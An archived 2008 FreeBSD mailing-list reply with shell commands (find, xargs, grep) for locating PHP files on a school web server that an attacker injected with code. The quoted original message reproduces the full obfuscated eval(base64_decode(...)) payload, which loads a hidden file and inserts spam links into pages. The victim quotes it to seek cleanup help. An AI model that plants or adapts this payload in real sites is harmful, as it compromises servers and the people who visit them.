From owner-freebsd-questions@FreeBSD.ORG Thu Dec 4 12:57:55 2008 Return-Path: Delivered-To: freebsd-questions@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 09DAA106564A for ; Thu, 4 Dec 2008 12:57:55 +0000 (UTC) (envelope-from jcigar@ulb.ac.be) Received: from mxin.ulb.ac.be (mxin.ulb.ac.be [164.15.128.112]) by mx1.freebsd.org (Postfix) with ESMTP id 9CC7B8FC08 for ; Thu, 4 Dec 2008 12:57:54 +0000 (UTC) (envelope-from jcigar@ulb.ac.be) X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AjMBAMtcN0mkD30E/2dsb2JhbAAIlFO7WoMC Received: from bebif01.ulb.ac.be (HELO [10.0.0.194]) ([164.15.125.4]) by smtp.ulb.ac.be with ESMTP; 04 Dec 2008 13:57:53 +0100 From: Julien Cigar To: mcoyles@horbury.wakefield.sch.uk In-Reply-To: <002b01c95609$ed0c7200$c7255600$@wakefield.sch.uk> References: <002b01c95609$ed0c7200$c7255600$@wakefield.sch.uk> Content-Type: text/plain; charset=utf-8 Date: Thu, 04 Dec 2008 13:58:20 +0100 Message-Id: <1228395500.2781.41.camel@frodon.be-bif.ulb.ac.be> Mime-Version: 1.0 X-Mailer: Evolution 2.22.3.1 Content-Transfer-Encoding: 8bit Cc: freebsd-questions@freebsd.org Subject: Re: Mass find/replace... X-BeenThere: freebsd-questions@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: User questions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 04 Dec 2008 12:57:55 -0000 the following should work : $ find /home/horbury -type f -print0 | xargs -0 grep 'base64_decode' or : $ find /home/horbury -type f -exec grep 'base64_decode' {} \; On Thu, 2008-12-04 at 12:14 +0000, Marc Coyles wrote: > Never had to do this so not sure where to start. Have googled and found > some solutions but they don't particularly work (see below)... > > Someone has managed to inject php code into a PILE of php pages on my > webserver... > > " /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNz > ZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhp > c3RzKCcvaG9tZS9ob3JidXJ5L3B1YmxpY19odG1sL3N0cmljdC9tb2R1bGVzL2Zja2VkaXRv > ci9mY2tlZGl0b3IvZWRpdG9yL2ZpbGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMv > aWNvbnMvMzIvbWRsX3V0Zi5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9ob3JidXJ5L3B1 > YmxpY19odG1sL3N0cmljdC9tb2R1bGVzL2Zja2VkaXRvci9mY2tlZGl0b3IvZWRpdG9yL2Zp > bGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMvaWNvbnMvMzIvbWRsX3V0Zi5waHAn > KTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcp > KXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgk > UjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdB > MzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYw > NjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRS > MEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMw > ODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5 > MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2 > OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZE > QTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4 > ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2 > QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4 > NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMy > ODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigk > UjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdB > N0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2 > NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31p > ZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdC > N0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFF > MzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMy > ODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUz > MTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNF > MDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0 > dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29i > aCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQt > RW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6 > ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0 > Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXty > ZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwk > UjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCku > JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcp > O319fQ==')); ?>" > > This basically brings up a pile of spam links. > > I need to do a find / replace throughout the entire of the > /home/horbury/public_html directory... > I've tried 'find /home/Horbury/ -type f | xargs grep -l base64_decode' > to get a list of the files that require the operation performing, but it > comes up with an error (xargs: unterminated quote) after a few > results... > > Any tips? Basically to find the above and remove it... otherwise I'll > have to resort to doing it in Dreamweaver and reuploading, which is a > major pita, or restoring from a backup (after working out when exactly > this happened and how - I'm guessing thru a teacher's out of date > wordpress install somewhere). > > Marc A Coyles - Horbury School ICT Support Team > Mbl: 07850 518106 > Land: 01924 282740 ext 730 > Helpdesk: 01924 282740 ext 2000 > > > > > _______________________________________________ > freebsd-questions@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-questions > To unsubscribe, send any mail to "freebsd-questions-unsubscribe@freebsd.org" -- Julien Cigar Belgian Biodiversity Platform http://www.biodiversity.be Université Libre de Bruxelles (ULB) Campus de la Plaine CP 257 Bâtiment NO, Bureau 4 N4 115C (Niveau 4) Boulevard du Triomphe, entrée ULB 2 B-1050 Bruxelles Mail: jcigar@ulb.ac.be @biobel: http://biobel.biodiversity.be/person/show/471 Tel : 02 650 57 52